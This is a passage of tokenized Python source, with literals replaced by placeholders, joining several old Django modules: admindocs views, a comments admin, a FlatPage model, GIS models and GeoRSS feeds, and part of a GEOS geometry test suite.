view_detail ) <EOL> def model_index ( request ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> m_list = [ m . _meta for m in models . get_models ( ) ] <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT>' : m_list <EOL> } , context_instance = RequestContext ( request ) ) <EOL> model_index = staff_member_required ( model_index ) <EOL> def model_detail ( request , app_label , model_name ) : <EOL> if not utils . docutils_is_available : <EOL> return missing_docutils_page ( request ) <EOL> try : <EOL> app_mod = models . get_app ( app_label ) <EOL> except ImproperlyConfigured : <EOL> raise Http404 ( _ ( "<STR_LIT>" ) % app_label ) <EOL> model = None <EOL> for m in models . get_models ( app_mod ) : <EOL> if m . _meta . object_name . lower ( ) == model_name : <EOL> model = m <EOL> break <EOL> if model is None : <EOL> raise Http404 ( _ ( "<STR_LIT>" ) % { '<STR_LIT>' : model_name , '<STR_LIT>' : app_label } ) <EOL> opts = model . _meta <EOL> fields = [ ] <EOL> for field in opts . fields : <EOL> if isinstance ( field , models . ForeignKey ) : <EOL> data_type = related_object_name = field . rel . to . __name__ <EOL> app_label = field . rel . to . _meta . app_label <EOL> verbose = utils . parse_rst ( ( _ ( "<STR_LIT>" ) % { '<STR_LIT>' : app_label , '<STR_LIT>' : data_type } ) , '<STR_LIT>' , _ ( '<STR_LIT>' ) + data_type ) <EOL> else : <EOL> data_type = get_readable_field_data_type ( field ) <EOL> verbose = field . verbose_name <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : field . name , <EOL> '<STR_LIT>' : data_type , <EOL> '<STR_LIT>' : verbose , <EOL> '<STR_LIT>' : field . help_text , <EOL> } ) <EOL> for field in opts . many_to_many : <EOL> data_type = related_object_name = field . rel . to . __name__ <EOL> app_label = field . rel . to . _meta . app_label <EOL> verbose = _ ( "<STR_LIT>" ) % { '<STR_LIT>' : app_label , '<STR_LIT:object_name>' : data_type } <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % field . name , <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % field . name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> for func_name , func in model . __dict__ . items ( ) : <EOL> if ( inspect . isfunction ( func ) and len ( inspect . getargspec ( func ) [ <NUM_LIT:0> ] ) == <NUM_LIT:1> ) : <EOL> try : <EOL> for exclude in MODEL_METHODS_EXCLUDE : <EOL> if func_name . startswith ( exclude ) : <EOL> raise StopIteration <EOL> except StopIteration : <EOL> continue <EOL> verbose = func . __doc__ <EOL> if verbose : <EOL> verbose = utils . parse_rst ( utils . trim_docstring ( verbose ) , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : func_name , <EOL> '<STR_LIT>' : get_return_data_type ( func_name ) , <EOL> '<STR_LIT>' : verbose , <EOL> } ) <EOL> for rel in opts . get_all_related_objects ( ) + opts . get_all_related_many_to_many_objects ( ) : <EOL> verbose = _ ( "<STR_LIT>" ) % { '<STR_LIT>' : rel . opts . app_label , '<STR_LIT:object_name>' : rel . opts . object_name } <EOL> accessor = rel . get_accessor_name ( ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % accessor , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> fields . append ( { <EOL> '<STR_LIT:name>' : "<STR_LIT>" % accessor , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : utils . parse_rst ( _ ( "<STR_LIT>" ) % verbose , '<STR_LIT>' , _ ( '<STR_LIT>' ) + opts . module_name ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT>' % ( opts . app_label , opts . object_name ) , <EOL> '<STR_LIT>' : _ ( "<STR_LIT>" ) % opts . object_name , <EOL> '<STR_LIT:description>' : model . __doc__ , <EOL> '<STR_LIT>' : fields , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> model_detail = staff_member_required ( model_detail ) <EOL> def template_detail ( request , template ) : <EOL> templates = [ ] <EOL> for site_settings_module in settings . ADMIN_FOR : <EOL> settings_mod = import_module ( site_settings_module ) <EOL> if Site . _meta . installed : <EOL> site_obj = Site . objects . get ( pk = settings_mod . SITE_ID ) <EOL> else : <EOL> site_obj = GenericSite ( ) <EOL> for dir in settings_mod . TEMPLATE_DIRS : <EOL> template_file = os . path . join ( dir , template ) <EOL> templates . append ( { <EOL> '<STR_LIT:file>' : template_file , <EOL> '<STR_LIT>' : os . path . exists ( template_file ) , <EOL> '<STR_LIT>' : lambda : os . path . exists ( template_file ) and open ( template_file ) . read ( ) or '<STR_LIT>' , <EOL> '<STR_LIT>' : settings_mod . SITE_ID , <EOL> '<STR_LIT>' : site_obj , <EOL> '<STR_LIT>' : list ( settings_mod . TEMPLATE_DIRS ) . index ( dir ) , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : get_root_path ( ) , <EOL> '<STR_LIT:name>' : template , <EOL> '<STR_LIT>' : templates , <EOL> } , context_instance = RequestContext ( request ) ) <EOL> template_detail = staff_member_required ( template_detail ) <EOL> def missing_docutils_page ( request ) : <EOL> """<STR_LIT>""" <EOL> return render_to_response ( '<STR_LIT>' ) <EOL> def load_all_installed_template_libraries ( ) : <EOL> for module_name in template . get_templatetags_modules ( ) : <EOL> mod = import_module ( module_name ) <EOL> libraries = [ <EOL> os . path . splitext ( p ) [ <NUM_LIT:0> ] <EOL> for p in os . listdir ( os . path . dirname ( mod . __file__ ) ) <EOL> if p . endswith ( '<STR_LIT>' ) and p [ <NUM_LIT:0> ] . isalpha ( ) <EOL> ] <EOL> for library_name in libraries : <EOL> try : <EOL> lib = template . get_library ( library_name ) <EOL> except template . InvalidTemplateLibrary , e : <EOL> pass <EOL> def get_return_data_type ( func_name ) : <EOL> """<STR_LIT>""" <EOL> if func_name . startswith ( '<STR_LIT>' ) : <EOL> if func_name . endswith ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> elif func_name . endswith ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_readable_field_data_type ( field ) : <EOL> """<STR_LIT>""" <EOL> return field . description % field . __dict__ <EOL> def extract_views_from_urlpatterns ( urlpatterns , base = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> views = [ ] <EOL> for p in urlpatterns : <EOL> if hasattr ( p , '<STR_LIT>' ) : <EOL> try : <EOL> views . append ( ( p . _get_callback ( ) , base + p . regex . pattern ) ) <EOL> except ViewDoesNotExist : <EOL> continue <EOL> elif hasattr ( p , '<STR_LIT>' ) : <EOL> try : <EOL> patterns = p . url_patterns <EOL> except ImportError : <EOL> continue <EOL> views . extend ( extract_views_from_urlpatterns ( patterns , base + p . regex . pattern ) ) <EOL> else : <EOL> raise TypeError ( _ ( "<STR_LIT>" ) % p ) <EOL> return views <EOL> named_group_matcher = re . compile ( r'<STR_LIT>' ) <EOL> non_named_group_matcher = re . compile ( r'<STR_LIT>' ) <EOL> def simplify_regex ( pattern ) : <EOL> """<STR_LIT>""" <EOL> pattern = named_group_matcher . sub ( lambda m : m . group ( <NUM_LIT:1> ) , pattern ) <EOL> pattern = non_named_group_matcher . sub ( "<STR_LIT>" , pattern ) <EOL> pattern = pattern . replace ( '<STR_LIT>' , '<STR_LIT>' ) . replace ( '<STR_LIT:$>' , '<STR_LIT>' ) . replace ( '<STR_LIT:?>' , '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> if not pattern . startswith ( '<STR_LIT:/>' ) : <EOL> pattern = '<STR_LIT:/>' + pattern <EOL> return pattern </s>
<s> from django . contrib import admin <EOL> from django . contrib . comments . models import Comment <EOL> from django . utils . translation import ugettext_lazy as _ , ungettext <EOL> from django . contrib . comments import get_model <EOL> from django . contrib . comments . views . moderation import perform_flag , perform_approve , perform_delete <EOL> class CommentsAdmin ( admin . ModelAdmin ) : <EOL> fieldsets = ( <EOL> ( None , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ( _ ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : ( '<STR_LIT:user>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ( _ ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) } <EOL> ) , <EOL> ) <EOL> list_display = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> date_hierarchy = '<STR_LIT>' <EOL> ordering = ( '<STR_LIT>' , ) <EOL> raw_id_fields = ( '<STR_LIT:user>' , ) <EOL> search_fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def get_actions ( self , request ) : <EOL> actions = super ( CommentsAdmin , self ) . get_actions ( request ) <EOL> if not request . user . is_superuser and '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> if not request . user . has_perm ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in actions : <EOL> actions . pop ( '<STR_LIT>' ) <EOL> return actions <EOL> def flag_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_flag , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> flag_comments . short_description = _ ( "<STR_LIT>" ) <EOL> def approve_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_approve , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> approve_comments . short_description = _ ( "<STR_LIT>" ) <EOL> def remove_comments ( self , request , queryset ) : <EOL> self . _bulk_flag ( request , queryset , perform_delete , <EOL> lambda n : ungettext ( '<STR_LIT>' , '<STR_LIT>' , n ) ) <EOL> remove_comments . short_description = _ ( "<STR_LIT>" ) <EOL> def _bulk_flag ( self , request , queryset , action , done_message ) : <EOL> """<STR_LIT>""" <EOL> n_comments = <NUM_LIT:0> <EOL> for comment in queryset : <EOL> action ( request , comment ) <EOL> n_comments += <NUM_LIT:1> <EOL> msg = ungettext ( u'<STR_LIT>' , <EOL> u'<STR_LIT>' , <EOL> n_comments ) <EOL> self . message_user ( request , msg % { '<STR_LIT:count>' : n_comments , '<STR_LIT:action>' : done_message ( n_comments ) } ) <EOL> if get_model ( ) is Comment : <EOL> admin . site . register ( Comment , CommentsAdmin ) </s>
<s> from django . db import models <EOL> from django . contrib . sites . models import Site <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> class FlatPage ( models . Model ) : <EOL> url = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> , db_index = True ) <EOL> title = models . CharField ( _ ( '<STR_LIT:title>' ) , max_length = <NUM_LIT:200> ) <EOL> content = models . TextField ( _ ( '<STR_LIT:content>' ) , blank = True ) <EOL> enable_comments = models . BooleanField ( _ ( '<STR_LIT>' ) ) <EOL> template_name = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT> , blank = True , <EOL> help_text = _ ( "<STR_LIT>" ) ) <EOL> registration_required = models . BooleanField ( _ ( '<STR_LIT>' ) , help_text = _ ( "<STR_LIT>" ) ) <EOL> sites = models . ManyToManyField ( Site ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> ordering = ( '<STR_LIT:url>' , ) <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( self . url , self . title ) <EOL> def get_absolute_url ( self ) : <EOL> return self . url </s>
<s> """<STR_LIT>""" <EOL> from django . contrib . gis . db import models <EOL> from django . contrib . gis . db . models . fields import GeometryField <EOL> from django . contrib . gis . db . backends . base import SpatialRefSysMixin <EOL> class GeometryColumns ( models . Model ) : <EOL> "<STR_LIT>" <EOL> table_name = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> column_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> srid = models . IntegerField ( primary_key = True ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> managed = False <EOL> @ classmethod <EOL> def table_name_col ( cls ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> @ classmethod <EOL> def geom_col_name ( cls ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' <EOL> def __unicode__ ( self ) : <EOL> return '<STR_LIT>' % ( self . table_name , self . column_name , self . srid ) <EOL> class SpatialRefSys ( models . Model , SpatialRefSysMixin ) : <EOL> "<STR_LIT>" <EOL> cs_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> srid = models . IntegerField ( primary_key = True ) <EOL> auth_srid = models . IntegerField ( ) <EOL> auth_name = models . CharField ( max_length = <NUM_LIT> ) <EOL> wktext = models . CharField ( max_length = <NUM_LIT> ) <EOL> cs_bounds = models . PolygonField ( null = True ) <EOL> objects = models . GeoManager ( ) <EOL> class Meta : <EOL> db_table = '<STR_LIT>' <EOL> managed = False <EOL> @ property <EOL> def wkt ( self ) : <EOL> return self . wktext <EOL> @ classmethod <EOL> def wkt_col ( cls ) : <EOL> return '<STR_LIT>' </s>
<s> from django . contrib . syndication . feeds import Feed as BaseFeed , FeedDoesNotExist <EOL> from django . utils . feedgenerator import Atom1Feed , Rss201rev2Feed <EOL> class GeoFeedMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def georss_coords ( self , coords ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT:U+0020>' . join ( [ u'<STR_LIT>' % ( coord [ <NUM_LIT:1> ] , coord [ <NUM_LIT:0> ] ) for coord in coords ] ) <EOL> def add_georss_point ( self , handler , coords , w3c_geo = False ) : <EOL> """<STR_LIT>""" <EOL> if w3c_geo : <EOL> lon , lat = coords [ : <NUM_LIT:2> ] <EOL> handler . addQuickElement ( u'<STR_LIT>' , u'<STR_LIT>' % lat ) <EOL> handler . addQuickElement ( u'<STR_LIT>' , u'<STR_LIT>' % lon ) <EOL> else : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( ( coords , ) ) ) <EOL> def add_georss_element ( self , handler , item , w3c_geo = False ) : <EOL> """<STR_LIT>""" <EOL> geom = item . get ( '<STR_LIT>' , None ) <EOL> if not geom is None : <EOL> if isinstance ( geom , ( list , tuple ) ) : <EOL> box_coords = None <EOL> if isinstance ( geom [ <NUM_LIT:0> ] , ( list , tuple ) ) : <EOL> if len ( geom ) == <NUM_LIT:2> : <EOL> box_coords = geom <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> else : <EOL> if len ( geom ) == <NUM_LIT:2> : <EOL> self . add_georss_point ( handler , geom , w3c_geo = w3c_geo ) <EOL> elif len ( geom ) == <NUM_LIT:4> : <EOL> box_coords = ( geom [ : <NUM_LIT:2> ] , geom [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not box_coords is None : <EOL> if w3c_geo : raise ValueError ( '<STR_LIT>' ) <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( box_coords ) ) <EOL> else : <EOL> gtype = str ( geom . geom_type ) . lower ( ) <EOL> if gtype == '<STR_LIT>' : <EOL> self . add_georss_point ( handler , geom . coords , w3c_geo = w3c_geo ) <EOL> else : <EOL> if w3c_geo : raise ValueError ( '<STR_LIT>' ) <EOL> if gtype in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( geom . coords ) ) <EOL> elif gtype in ( '<STR_LIT>' , ) : <EOL> handler . addQuickElement ( u'<STR_LIT>' , self . georss_coords ( geom [ <NUM_LIT:0> ] . coords ) ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % geom . geom_type ) <EOL> class GeoRSSFeed ( Rss201rev2Feed , GeoFeedMixin ) : <EOL> def rss_attributes ( self ) : <EOL> attrs = super ( GeoRSSFeed , self ) . rss_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( GeoRSSFeed , self ) . add_item_elements ( handler , item ) <EOL> self . add_georss_element ( handler , item ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( GeoRSSFeed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed ) <EOL> class GeoAtom1Feed ( Atom1Feed , GeoFeedMixin ) : <EOL> def root_attributes ( self ) : <EOL> attrs = super ( GeoAtom1Feed , self ) . root_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( GeoAtom1Feed , self ) . add_item_elements ( handler , item ) <EOL> self . add_georss_element ( handler , item ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( GeoAtom1Feed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed ) <EOL> class W3CGeoFeed ( Rss201rev2Feed , GeoFeedMixin ) : <EOL> def rss_attributes ( self ) : <EOL> attrs = super ( W3CGeoFeed , self ) . rss_attributes ( ) <EOL> attrs [ u'<STR_LIT>' ] = u'<STR_LIT>' <EOL> return attrs <EOL> def add_item_elements ( self , handler , item ) : <EOL> super ( W3CGeoFeed , self ) . add_item_elements ( handler , item ) <EOL> self . add_georss_element ( handler , item , w3c_geo = True ) <EOL> def add_root_elements ( self , handler ) : <EOL> super ( W3CGeoFeed , self ) . add_root_elements ( handler ) <EOL> self . add_georss_element ( handler , self . feed , w3c_geo = True ) <EOL> class Feed ( BaseFeed ) : <EOL> """<STR_LIT>""" <EOL> feed_type = GeoRSSFeed <EOL> def feed_extra_kwargs ( self , obj ) : <EOL> return { '<STR_LIT>' : self . __get_dynamic_attr ( '<STR_LIT>' , obj ) } <EOL> def item_extra_kwargs ( self , item ) : <EOL> return { '<STR_LIT>' : self . __get_dynamic_attr ( '<STR_LIT>' , item ) } </s>
<s> from django . contrib . gis . geos import ( <EOL> GEOSGeometry as Geometry , GEOSException as GeometryException ) </s>
<s> import ctypes , random , unittest , sys <EOL> from django . contrib . gis . geos import * <EOL> from django . contrib . gis . geos . base import gdal , numpy , GEOSBase <EOL> from django . contrib . gis . geometry . test_data import TestDataMixin <EOL> class GEOSTest ( unittest . TestCase , TestDataMixin ) : <EOL> @ property <EOL> def null_srid ( self ) : <EOL> """<STR_LIT>""" <EOL> info = geos_version_info ( ) <EOL> if info [ '<STR_LIT:version>' ] == '<STR_LIT>' and info [ '<STR_LIT>' ] : <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return None <EOL> def test00_base ( self ) : <EOL> "<STR_LIT>" <EOL> class FakeGeom1 ( GEOSBase ) : <EOL> pass <EOL> c_float_p = ctypes . POINTER ( ctypes . c_float ) <EOL> class FakeGeom2 ( GEOSBase ) : <EOL> ptr_type = c_float_p <EOL> fg1 = FakeGeom1 ( ) <EOL> fg2 = FakeGeom2 ( ) <EOL> fg1 . ptr = ctypes . c_void_p ( ) <EOL> fg1 . ptr = None <EOL> fg2 . ptr = c_float_p ( ctypes . c_float ( <NUM_LIT> ) ) <EOL> fg2 . ptr = None <EOL> for fg in ( fg1 , fg2 ) : <EOL> self . assertRaises ( GEOSException , fg . _get_ptr ) <EOL> bad_ptrs = ( <NUM_LIT:5> , ctypes . c_char_p ( '<STR_LIT>' ) ) <EOL> for bad_ptr in bad_ptrs : <EOL> self . assertRaises ( TypeError , fg1 . _set_ptr , bad_ptr ) <EOL> self . assertRaises ( TypeError , fg2 . _set_ptr , bad_ptr ) <EOL> def test01a_wkt ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . wkt_out : <EOL> geom = fromstr ( g . wkt ) <EOL> self . assertEqual ( g . ewkt , geom . wkt ) <EOL> def test01b_hex ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . hex_wkt : <EOL> geom = fromstr ( g . wkt ) <EOL> self . assertEqual ( g . hex , geom . hex ) <EOL> def test01b_hexewkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import a2b_hex <EOL> ogc_hex = '<STR_LIT>' <EOL> hexewkb_2d = '<STR_LIT>' <EOL> hexewkb_3d = '<STR_LIT>' <EOL> pnt_2d = Point ( <NUM_LIT:0> , <NUM_LIT:1> , srid = <NUM_LIT> ) <EOL> pnt_3d = Point ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , srid = <NUM_LIT> ) <EOL> self . assertEqual ( ogc_hex , pnt_2d . hex ) <EOL> self . assertEqual ( ogc_hex , pnt_3d . hex ) <EOL> self . assertEqual ( hexewkb_2d , pnt_2d . hexewkb ) <EOL> if GEOS_PREPARE : <EOL> self . assertEqual ( hexewkb_3d , pnt_3d . hexewkb ) <EOL> self . assertEqual ( True , GEOSGeometry ( hexewkb_3d ) . hasz ) <EOL> else : <EOL> try : <EOL> hexewkb = pnt_3d . hexewkb <EOL> except GEOSException : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( buffer ( a2b_hex ( hexewkb_2d ) ) , pnt_2d . ewkb ) <EOL> if GEOS_PREPARE : <EOL> self . assertEqual ( buffer ( a2b_hex ( hexewkb_3d ) ) , pnt_3d . ewkb ) <EOL> else : <EOL> try : <EOL> ewkb = pnt_3d . ewkb <EOL> except GEOSException : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT> , GEOSGeometry ( hexewkb_2d ) . srid ) <EOL> def test01c_kml ( self ) : <EOL> "<STR_LIT>" <EOL> for tg in self . geometries . wkt_out : <EOL> geom = fromstr ( tg . wkt ) <EOL> kml = getattr ( tg , '<STR_LIT>' , False ) <EOL> if kml : self . assertEqual ( kml , geom . kml ) <EOL> def test01d_errors ( self ) : <EOL> "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> for err in self . geometries . errors : <EOL> try : <EOL> g = fromstr ( err . wkt ) <EOL> except ( GEOSException , ValueError ) : <EOL> pass <EOL> self . assertRaises ( GEOSException , GEOSGeometry , buffer ( '<STR_LIT:0>' ) ) <EOL> print "<STR_LIT>" <EOL> class NotAGeometry ( object ) : <EOL> pass <EOL> self . assertRaises ( TypeError , GEOSGeometry , NotAGeometry ( ) ) <EOL> self . assertRaises ( TypeError , GEOSGeometry , None ) <EOL> def test01e_wkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import b2a_hex <EOL> for g in self . geometries . hex_wkt : <EOL> geom = fromstr ( g . wkt ) <EOL> wkb = geom . wkb <EOL> self . assertEqual ( b2a_hex ( wkb ) . upper ( ) , g . hex ) <EOL> def test01f_create_hex ( self ) : <EOL> "<STR_LIT>" <EOL> for g in self . geometries . hex_wkt : <EOL> geom_h = GEOSGeometry ( g . hex ) <EOL> geom_t = fromstr ( g . wkt ) <EOL> self . assertEqual ( geom_t . wkt , geom_h . wkt ) <EOL> def test01g_create_wkb ( self ) : <EOL> "<STR_LIT>" <EOL> from binascii import a2b_hex <EOL> for g in self . geometries . hex_wkt : <EOL> wkb = buffer ( a2b_hex ( g . hex ) ) <EOL> geom_h = GEOSGeometry ( wkb ) <EOL> geom_t = fromstr ( g . wkt ) <EOL> self . assertEqual ( geom_t . wkt , geom_h . wkt ) <EOL> def test01h_ewkt ( self ) : <EOL> "<STR_LIT>" <EOL> srid = <NUM_LIT> <EOL> for p in self . geometries . polygons : <EOL> ewkt = '<STR_LIT>' % ( srid , p . wkt ) <EOL> poly = fromstr ( ewkt ) <EOL> self . assertEqual ( srid , poly . srid ) <EOL> self . assertEqual ( srid , poly . shell . srid ) <EOL> self . assertEqual ( srid , fromstr ( poly . ewkt ) . srid ) <EOL> def test01i_json ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal or not gdal . GEOJSON : return <EOL> for g in self . geometries . json_geoms : <EOL> geom = GEOSGeometry ( g . wkt ) <EOL> if not hasattr ( g , '<STR_LIT>' ) : <EOL> self . assertEqual ( g . json , geom . json ) <EOL> self . assertEqual ( g . json , geom . geojson ) <EOL> self . assertEqual ( GEOSGeometry ( g . wkt ) , GEOSGeometry ( geom . json ) ) <EOL> def test01k_fromfile ( self ) : <EOL> "<STR_LIT>" <EOL> from StringIO import StringIO <EOL> ref_pnt = GEOSGeometry ( '<STR_LIT>' ) <EOL> wkt_f = StringIO ( ) <EOL> wkt_f . write ( ref_pnt . wkt ) <EOL> wkb_f = StringIO ( ) <EOL> wkb_f . write ( str ( ref_pnt . wkb ) ) <EOL> for fh in ( wkt_f , wkb_f ) : <EOL> fh . seek ( <NUM_LIT:0> ) <EOL> pnt = fromfile ( fh ) <EOL> self . assertEqual ( ref_pnt , pnt ) <EOL> def test01k_eq ( self ) : <EOL> "<STR_LIT>" <EOL> p = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( p , p . wkt ) <EOL> self . assertNotEqual ( p , '<STR_LIT:foo>' ) <EOL> ls = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( ls , ls . wkt ) <EOL> self . assertNotEqual ( p , '<STR_LIT:bar>' ) <EOL> for g in ( p , ls ) : <EOL> self . assertNotEqual ( g , None ) <EOL> self . assertNotEqual ( g , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } ) <EOL> self . assertNotEqual ( g , False ) <EOL> def test02a_points ( self ) : <EOL> "<STR_LIT>" <EOL> prev = fromstr ( '<STR_LIT>' ) <EOL> for p in self . geometries . points : <EOL> pnt = fromstr ( p . wkt ) <EOL> self . assertEqual ( pnt . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( pnt . geom_typeid , <NUM_LIT:0> ) <EOL> self . assertEqual ( p . x , pnt . x ) <EOL> self . assertEqual ( p . y , pnt . y ) <EOL> self . assertEqual ( True , pnt == fromstr ( p . wkt ) ) <EOL> self . assertEqual ( False , pnt == prev ) <EOL> self . assertAlmostEqual ( p . x , pnt . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( p . y , pnt . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> if hasattr ( p , '<STR_LIT:z>' ) : <EOL> self . assertEqual ( True , pnt . hasz ) <EOL> self . assertEqual ( p . z , pnt . z ) <EOL> self . assertEqual ( p . z , pnt . tuple [ <NUM_LIT:2> ] , <NUM_LIT:9> ) <EOL> tup_args = ( p . x , p . y , p . z ) <EOL> set_tup1 = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> set_tup2 = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> else : <EOL> self . assertEqual ( False , pnt . hasz ) <EOL> self . assertEqual ( None , pnt . z ) <EOL> tup_args = ( p . x , p . y ) <EOL> set_tup1 = ( <NUM_LIT> , <NUM_LIT> ) <EOL> set_tup2 = ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( p . centroid , pnt . centroid . tuple ) <EOL> pnt2 = Point ( tup_args ) <EOL> pnt3 = Point ( * tup_args ) <EOL> self . assertEqual ( True , pnt == pnt2 ) <EOL> self . assertEqual ( True , pnt == pnt3 ) <EOL> pnt . y = <NUM_LIT> <EOL> pnt . x = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , pnt . y ) <EOL> self . assertEqual ( <NUM_LIT> , pnt . x ) <EOL> pnt . tuple = set_tup1 <EOL> self . assertEqual ( set_tup1 , pnt . tuple ) <EOL> pnt . coords = set_tup2 <EOL> self . assertEqual ( set_tup2 , pnt . coords ) <EOL> prev = pnt <EOL> def test02b_multipoints ( self ) : <EOL> "<STR_LIT>" <EOL> for mp in self . geometries . multipoints : <EOL> mpnt = fromstr ( mp . wkt ) <EOL> self . assertEqual ( mpnt . geom_type , '<STR_LIT>' ) <EOL> self . assertEqual ( mpnt . geom_typeid , <NUM_LIT:4> ) <EOL> self . assertAlmostEqual ( mp . centroid [ <NUM_LIT:0> ] , mpnt . centroid . tuple [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( mp . centroid [ <NUM_LIT:1> ] , mpnt . centroid . tuple [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> self . assertRaises ( GEOSIndexError , mpnt . __getitem__ , len ( mpnt ) 